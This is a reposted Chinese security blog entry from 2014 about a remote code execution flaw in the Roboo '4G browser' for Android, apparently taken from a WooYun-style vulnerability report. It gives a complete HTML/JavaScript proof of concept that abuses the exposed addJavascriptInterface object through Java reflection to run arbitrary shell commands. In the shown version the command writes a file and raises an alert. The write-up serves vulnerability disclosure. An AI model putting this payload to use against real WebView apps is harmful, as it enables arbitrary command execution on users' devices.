记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

4G浏览器远程代码执行漏洞

2014-10-05 03:30

下载懦豹4G浏览器: http://4g.roboo.com/ 下载dex2jar和jd-gui

搜索addJavascriptInterface

 

QQ截图20140628135917.png



Navigator接口漏洞

构造一个写文件+弹窗的Exp:
 


<html>
<head>
<title>test</title>
</head>

<body>

<script>

function execute(testcmd)

{

return Navigator.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(testcmd);



}

try{

execute(["/system/bin/sh","-c","echo 'Webview远程命令执行漏洞测试.' > /sdcard/paxmac.txt"]);

alert("WooYun!");

}catch(e){

alert(e);

}

</script>
</body>

</html>



弹窗:
 

Screenshot_2014-06-28-14-02-46.png



写文件:
 

QQ截图20140628134415.png

 

修复方案:

:)

知识来源: www.2cto.com/Article/201410/339801.html

阅读:80761 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“4G浏览器远程代码执行漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

推广

标签云